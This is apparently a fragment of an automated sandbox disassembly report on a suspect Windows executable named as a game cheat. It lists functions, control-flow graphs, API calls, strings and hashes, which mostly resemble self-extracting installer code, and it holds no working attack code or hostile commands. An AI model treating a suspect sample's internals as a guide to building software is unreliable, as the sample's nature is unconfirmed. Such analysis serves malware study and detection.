d00df3-d00df5 ExitProcess 327->333 334 d00da8-d00ded GetCurrentProcessId AttachConsole call d13e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 00D0087C
                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D0088E
                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D008BF
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D00B69
                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D00B83
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D00B93
                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00D23C7C,00000000), ref: 00D00BB1
                                                    • CloseHandle.KERNEL32(00000000), ref: 00D00C09
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D00C1E
                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00D23C7C,?,00000000,?,00000800), ref: 00D00C72
                                                    • GetFileAttributesW.KERNELBASE(?,?,00D23C7C,00000800,?,00000000,?,00000800), ref: 00D00C9C
                                                    • GetFileAttributesW.KERNEL32(?,?,00D23D44,00000800), ref: 00D00CD8
                                                      • Part of subcall function 00D0081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D00836
                                                      • Part of subcall function 00D0081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CFF2D8,Crypt32.dll,00000000,00CFF35C,?,?,00CFF33E,?,?,?), ref: 00D00858
                                                    • _swprintf.LIBCMT ref: 00D00D4A
                                                    • _swprintf.LIBCMT ref: 00D00D96
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                    • AllocConsole.KERNEL32 ref: 00D00D9E
                                                    • GetCurrentProcessId.KERNEL32 ref: 00D00DA8
                                                    • AttachConsole.KERNEL32(00000000), ref: 00D00DAF
                                                    • _wcslen.LIBCMT ref: 00D00DC4
                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D00DD5
                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00D00DDC
                                                    • Sleep.KERNEL32(00002710), ref: 00D00DE7
                                                    • FreeConsole.KERNEL32 ref: 00D00DED
                                                    • ExitProcess.KERNEL32 ref: 00D00DF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                    • API String ID: 1207345701-3298887752
                                                    • Opcode ID: 39216eb9ed60d94d4dac96903a122c640b16e49e28e057db2cc6e338e6ae40bc
                                                    • Instruction ID: c429eb8f819052acc8ff12c6ad75f50ecbe747785d2e35f96efea2cf9ce2a720
                                                    • Opcode Fuzzy Hash: 39216eb9ed60d94d4dac96903a122c640b16e49e28e057db2cc6e338e6ae40bc
                                                    • Instruction Fuzzy Hash: 25D1A5B1108394AFD3319F50E948B9FBAE8FFA5708F40491DF68996390C7788649CB76
                                                    Function 00D0C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 347 d0c73f-d0c757 call d0eb78 call d0ec50 352 d0d40d-d0d418 347->352 353 d0c75d-d0c787 call d0b314 347->353 353->352 356 d0c78d-d0c792 353->356 357 d0c793-d0c7a1 356->357 358 d0c7a2-d0c7b7 call d0af98 357->358 361 d0c7b9 358->361 362 d0c7bb-d0c7d0 call d01fbb 361->362 365 d0c7d2-d0c7d6 362->365 366 d0c7dd-d0c7e0 362->366 365->362 367 d0c7d8 365->367 368 d0c7e6 366->368 369 d0d3d9-d0d404 call d0b314 366->369 367->369 370 d0ca7c-d0ca7e 368->370 371 d0c7ed-d0c7f0 368->371 372 d0c9be-d0c9c0 368->372 373 d0ca5f-d0ca61 368->373 369->357 383 d0d40a-d0d40c 369->383 370->369 379 d0ca84-d0ca8b 370->379 371->369 376 d0c7f6-d0c850 call d0a64d call cfbdf3 call cfa544 call cfa67e call cf6edb 371->376 372->369 375 d0c9c6-d0c9d2 372->375 373->369 378 d0ca67-d0ca77 SetWindowTextW 373->378 380 d0c9d4-d0c9e5 call d17686 375->380 381 d0c9e6-d0c9eb 375->381 438 d0c98f-d0c9a4 call cfa5d1 376->438 378->369 379->369 384 d0ca91-d0caaa 379->384 380->381 389 d0c9f5-d0ca00 call d0b48e 381->389 390 d0c9ed-d0c9f3 381->390 383->352 385 d0cab2-d0cac0 call d13e13 384->385 386 d0caac 384->386 385->369 401 d0cac6-d0cacf 385->401 386->385 394 d0ca05-d0ca07 389->394 390->394 399 d0ca12-d0ca32 call d13e13 call d13e3e 394->399 400 d0ca09-d0ca10 call d13e13 394->400 421 d0ca34-d0ca3b 399->421 422 d0ca4b-d0ca4d 399->422 400->399 405 d0cad1-d0cad5 401->405 406 d0caf8-d0cafb 401->406 411 d0cb01-d0cb04 405->411 412 d0cad7-d0cadf 405->412 406->411 414 d0cbe0-d0cbee call d00602 406->414 419 d0cb11-d0cb2c 411->419 420 d0cb06-d0cb0b 411->420 412->369 417 d0cae5-d0caf3 call d00602 412->417 429 d0cbf0-d0cc04 call d1279b 414->429 417->429 433 d0cb76-d0cb7d 419->433 434 d0cb2e-d0cb68 419->434 420->414 420->419 426 d0ca42-d0ca4a call d17686 421->426 427 d0ca3d-d0ca3f 421->427 422->369 428 d0ca53-d0ca5a call d13e2e 422->428 426->422 427->426 428->369 447 d0cc11-d0cc62 call d00602 call d0b1be GetDlgItem SetWindowTextW SendMessageW call d13e49 429->447 448 d0cc06-d0cc0a 429->448 440 d0cbab-d0cbce call d13e13 * 2 433->440 441 d0cb7f-d0cb97 call d13e13 433->441 467 d0cb6a 434->467 468 d0cb6c-d0cb6e 434->468 453 d0c855-d0c869 SetFileAttributesW 438->453 454 d0c9aa-d0c9b9 call cfa55a 438->454 440->429 473 d0cbd0-d0cbde call d005da 440->473 441->440 459 d0cb99-d0cba6 call d005da 441->459 481 d0cc67-d0cc6b 447->481 448->447 452 d0cc0c-d0cc0e 448->452 452->447 460 d0c90f-d0c91f GetFileAttributesW 453->460 461 d0c86f-d0c8a2 call cfb991 call cfb690 call d13e13 453->461 454->369 459->440 460->438 466 d0c921-d0c930 DeleteFileW 460->466 490 d0c8a4-d0c8b3 call d13e13 461->490 491 d0c8b5-d0c8c3 call cfbdb4 461->491 466->438 474 d0c932-d0c935 466->474 467->468 468->433 473->429 479 d0c939-d0c965 call cf4092 GetFileAttributesW 474->479 488 d0c937-d0c938 479->488 489 d0c967-d0c97d MoveFileW 479->489 481->369 485 d0cc71-d0cc85 SendMessageW 481->485 485->369 488->479 489->438 492 d0c97f-d0c989 MoveFileExW 489->492 490->491 497 d0c8c9-d0c908 call d13e13 call d0fff0 490->497 491->454 491->497 492->438 497->460
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00D0C744
                                                      • Part of subcall function 00D0B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D0B3FB
                                                    • _wcslen.LIBCMT ref: 00D0CA0A
                                                    • _wcslen.LIBCMT ref: 00D0CA13
                                                    • SetWindowTextW.USER32(?,?), ref: 00D0CA71
                                                    • _wcslen.LIBCMT ref: 00D0CAB3
                                                    • _wcsrchr.LIBVCRUNTIME ref: 00D0CBFB
                                                    • GetDlgItem.USER32(?,00000066), ref: 00D0CC36
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00D0CC46
                                                    • SendMessageW.USER32(00000000,00000143,00000000,00D3A472), ref: 00D0CC54
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D0CC7F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                    • API String ID: 2804936435-312220925
                                                    • Opcode ID: a1d09c94227c4ee95b081d17f5c3e197b80d9154e57a927a44aa5230d4716d59
                                                    • Instruction ID: 237343bbea9f14577c0a5e4d5c083851c25c8d31cb0a2dd393826df71931911e
                                                    • Opcode Fuzzy Hash: a1d09c94227c4ee95b081d17f5c3e197b80d9154e57a927a44aa5230d4716d59
                                                    • Instruction Fuzzy Hash: 25E143B2900219AADB24DBA4EC85FEE73BCDB05350F5441A6F649E3190EF749A848F71
                                                    Function 00CFDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CFDA70
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CFDAAC
                                                      • Part of subcall function 00CFC29A: _wcslen.LIBCMT ref: 00CFC2A2
                                                      • Part of subcall function 00D005DA: _wcslen.LIBCMT ref: 00D005E0
                                                      • Part of subcall function 00D01B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CFBAE9,00000000,?,?,?,000103DE), ref: 00D01BA0
                                                    • _wcslen.LIBCMT ref: 00CFDDE9
                                                    • __fprintf_l.LIBCMT ref: 00CFDF1C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                    • API String ID: 566448164-801612888
                                                    • Opcode ID: 653ac419eb055fbf2c1d7da86bdac57dd0acb3aea3a64cf8252b537137013c6e
                                                    • Instruction ID: 64e1b22ce9095ee85beaac90b65c49b0c1e9811642e0c2e827301edb77949056
                                                    • Opcode Fuzzy Hash: 653ac419eb055fbf2c1d7da86bdac57dd0acb3aea3a64cf8252b537137013c6e
                                                    • Instruction Fuzzy Hash: 9732E07190021CABCF64EF68D841BFE77A5FF15300F40416AFA1697291EBB1DA85CB62
                                                    Function 00D0D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00D0B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D0B579
                                                      • Part of subcall function 00D0B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D0B58A
                                                      • Part of subcall function 00D0B568: IsDialogMessageW.USER32(000103DE,?), ref: 00D0B59E
                                                      • Part of subcall function 00D0B568: TranslateMessage.USER32(?), ref: 00D0B5AC
                                                      • Part of subcall function 00D0B568: DispatchMessageW.USER32(?), ref: 00D0B5B6
                                                    • GetDlgItem.USER32(00000068,00D4FCB8), ref: 00D0D4E8
                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00D0AF07,00000001,?,?,00D0B7B9,00D2506C,00D4FCB8,00D4FCB8,00001000,00000000,00000000), ref: 00D0D510
                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D0D51B
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00D235F4), ref: 00D0D529
                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D0D53F
                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D0D559
                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D0D59D
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D0D5AB
                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D0D5BA
                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D0D5E1
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00D243F4), ref: 00D0D5F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                    • String ID: \
                                                    • API String ID: 3569833718-2967466578
                                                    • Opcode ID: cde0ec396515a0ebb154b15d9db5cc0b3a6b886df0a691c315bea5c2a9b2b0b1
                                                    • Instruction ID: 977103869d91d22a85d017c5ad9f2e167ab769bd4fd60832688dee90788c471a
                                                    • Opcode Fuzzy Hash: cde0ec396515a0ebb154b15d9db5cc0b3a6b886df0a691c315bea5c2a9b2b0b1
                                                    • Instruction Fuzzy Hash: 0C31E271145742BFE301DF24EC4AFAB7FACEB86769F000509F951D62D0EB648A088776
                                                    Function 00D0D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 836 d0d78f-d0d7a7 call d0ec50 839 d0d9e8-d0d9f0 836->839 840 d0d7ad-d0d7b9 call d13e13 836->840 840->839 843 d0d7bf-d0d7e7 call d0fff0 840->843 846 d0d7f1-d0d7ff 843->846 847 d0d7e9 843->847 848 d0d801-d0d804 846->848 849 d0d812-d0d818 846->849 847->846 850 d0d808-d0d80e 848->850 851 d0d85b-d0d85e 849->851 853 d0d810 850->853 854 d0d837-d0d844 850->854 851->850 852 d0d860-d0d866 851->852 855 d0d868-d0d86b 852->855 856 d0d86d-d0d86f 852->856 857 d0d822-d0d82c 853->857 858 d0d9c0-d0d9c2 854->858 859 d0d84a-d0d84e 854->859 855->856 860 d0d882-d0d898 call cfb92d 855->860 856->860 861 d0d871-d0d878 856->861 862 d0d81a-d0d820 857->862 863 d0d82e 857->863 864 d0d9c6 858->864 859->864 865 d0d854-d0d859 859->865 872 d0d8b1-d0d8bc call cfa231 860->872 873 d0d89a-d0d8a7 call d01fbb 860->873 861->860 866 d0d87a 861->866 862->857 868 d0d830-d0d833 862->868 863->854 869 d0d9cf 864->869 865->851 866->860 868->854 871 d0d9d6-d0d9d8 869->871 874 d0d9e7 871->874 875 d0d9da-d0d9dc 871->875 882 d0d8d9-d0d8e6 ShellExecuteExW 872->882 883 d0d8be-d0d8d5 call cfb6c4 872->883 873->872 881 d0d8a9 873->881 874->839 875->874 878 d0d9de-d0d9e1 ShowWindow 875->878 878->874 881->872 882->874 885 d0d8ec-d0d8f9 882->885 883->882 887 d0d8fb-d0d902 885->887 888 d0d90c-d0d90e 885->888 887->888 889 d0d904-d0d90a 887->889 890 d0d910-d0d919 888->890 891 d0d925-d0d944 call d0dc3b 888->891 889->888 892 d0d97b-d0d987 CloseHandle 889->892 890->891 899 d0d91b-d0d923 ShowWindow 890->899 891->892 904 d0d946-d0d94e 891->904 893 d0d998-d0d9a6 892->893 894 d0d989-d0d996 call d01fbb 892->894 893->871 898 d0d9a8-d0d9aa 893->898 894->869 894->893 898->871 902 d0d9ac-d0d9b2 898->902 899->891 902->871 905 d0d9b4-d0d9be 902->905 904->892 906 d0d950-d0d961 GetExitCodeProcess 904->906 905->871 906->892 907 d0d963-d0d96d 906->907 908 d0d974 907->908 909 d0d96f 907->909 908->892 909->908
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00D0D7AE
                                                    • ShellExecuteExW.SHELL32(?), ref: 00D0D8DE
                                                    • ShowWindow.USER32(?,00000000), ref: 00D0D91D
                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00D0D959
                                                    • CloseHandle.KERNEL32(?), ref: 00D0D97F
                                                    • ShowWindow.USER32(?,00000001), ref: 00D0D9E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                    • String ID: .exe$.inf
                                                    • API String ID: 36480843-3750412487
                                                    • Opcode ID: 2cdff9399828761895000811f3333fc0bf73623e68580b0f3dbd64e9ca1e9bb1
                                                    • Instruction ID: 20ed5849222a23df68474eeef0b9754934016c5da02d4938bf14787754c8042d
                                                    • Opcode Fuzzy Hash: 2cdff9399828761895000811f3333fc0bf73623e68580b0f3dbd64e9ca1e9bb1
                                                    • Instruction Fuzzy Hash: D551B2755043809ADB319FA4A844BABBBE6EF42744F08441FF9C9D72E1D7718A84CB72
                                                    Function 00D1A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 910 d1a95b-d1a974 911 d1a976-d1a986 call d1ef4c 910->911 912 d1a98a-d1a98f 910->912 911->912 919 d1a988 911->919 914 d1a991-d1a999 912->914 915 d1a99c-d1a9c0 MultiByteToWideChar 912->915 914->915 917 d1ab53-d1ab66 call d0fbbc 915->917 918 d1a9c6-d1a9d2 915->918 920 d1a9d4-d1a9e5 918->920 921 d1aa26 918->921 919->912 924 d1aa04-d1aa15 call d18e06 920->924 925 d1a9e7-d1a9f6 call d22010 920->925 923 d1aa28-d1aa2a 921->923 927 d1aa30-d1aa43 MultiByteToWideChar 923->927 928 d1ab48 923->928 924->928 935 d1aa1b 924->935 925->928 938 d1a9fc-d1aa02 925->938 927->928 931 d1aa49-d1aa5b call d1af6c 927->931 932 d1ab4a-d1ab51 call d1abc3 928->932 940 d1aa60-d1aa64 931->940 932->917 939 d1aa21-d1aa24 935->939 938->939 939->923 940->928 942 d1aa6a-d1aa71 940->942 943 d1aa73-d1aa78 942->943 944 d1aaab-d1aab7 942->944 943->932 947 d1aa7e-d1aa80 943->947 945 d1ab03 944->945 946 d1aab9-d1aaca 944->946 950 d1ab05-d1ab07 945->950 948 d1aae5-d1aaf6 call d18e06 946->948 949 d1aacc-d1aadb call d22010 946->949 947->928 951 d1aa86-d1aaa0 call d1af6c 947->951 954 d1ab41-d1ab47 call d1abc3 948->954 964 d1aaf8 948->964 949->954 962 d1aadd-d1aae3 949->962 950->954 955 d1ab09-d1ab22 call d1af6c 950->955 951->932 966 d1aaa6 951->966 954->928 955->954 968 d1ab24-d1ab2b 955->968 967 d1aafe-d1ab01 962->967 964->967 966->928 967->950 969 d1ab67-d1ab6d 968->969 970 d1ab2d-d1ab2e 968->970 971 d1ab2f-d1ab3f WideCharToMultiByte 969->971 970->971 971->954 972 d1ab6f-d1ab76 call d1abc3 971->972 972->932
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D15695,00D15695,?,?,?,00D1ABAC,00000001,00000001,2DE85006), ref: 00D1A9B5
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D1ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00D1AA3B
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D1AB35
                                                    • __freea.LIBCMT ref: 00D1AB42
                                                      • Part of subcall function 00D18E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D1CA2C,00000000,?,00D16CBE,?,00000008,?,00D191E0,?,?,?), ref: 00D18E38
                                                    • __freea.LIBCMT ref: 00D1AB4B
                                                    • __freea.LIBCMT ref: 00D1AB70
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1414292761-0
                                                    • Opcode ID: f56aa9b3934d3b9176b4ce02f22ae5c376632b8e68d82c4e76a66063e81dd381
                                                    • Instruction ID: 03553e0234644dc9a5fb9b0b73a36c259544bd6c569df73b50c01f307020d388
                                                    • Opcode Fuzzy Hash: f56aa9b3934d3b9176b4ce02f22ae5c376632b8e68d82c4e76a66063e81dd381
                                                    • Instruction Fuzzy Hash: DE51C072602256BBDB258E68ED41EFBB7AAEF40710F194629FC05D6141EF34DC80C6B1
                                                    Function 00D13B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 975 d13b72-d13b7c 976 d13bee-d13bf1 975->976 977 d13bf3 976->977 978 d13b7e-d13b8c 976->978 981 d13bf5-d13bf9 977->981 979 d13b95-d13bb1 LoadLibraryExW 978->979 980 d13b8e-d13b91 978->980 984 d13bb3-d13bbc GetLastError 979->984 985 d13bfa-d13c00 979->985 982 d13b93 980->982 983 d13c09-d13c0b 980->983 986 d13beb 982->986 983->981 987 d13be6-d13be9 984->987 988 d13bbe-d13bd3 call d16088 984->988 985->983 989 d13c02-d13c03 FreeLibrary 985->989 986->976 987->986 988->987 992 d13bd5-d13be4 LoadLibraryExW 988->992 989->983 992->985 992->987
                                                    APIs
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00D13C35,?,?,00D52088,00000000,?,00D13D60,00000004,InitializeCriticalSectionEx,00D26394,InitializeCriticalSectionEx,00000000), ref: 00D13C03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID: api-ms-
                                                    • API String ID: 3664257935-2084034818
                                                    • Opcode ID: 9947e51fe337423862a4802c07b06567076a044b804ff0517fbccfa989e2b09e
                                                    • Instruction ID: 6053f6efdad7e03b52e7305f75a53642be4813bff4ee069b9894860836eb0880
                                                    • Opcode Fuzzy Hash: 9947e51fe337423862a4802c07b06567076a044b804ff0517fbccfa989e2b09e
                                                    • Instruction Fuzzy Hash: 5E11A735A49321BBDB318B58ED41BD937649F11770F190120E955EB290FB70EF8086F5
                                                    Function 00CF98E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
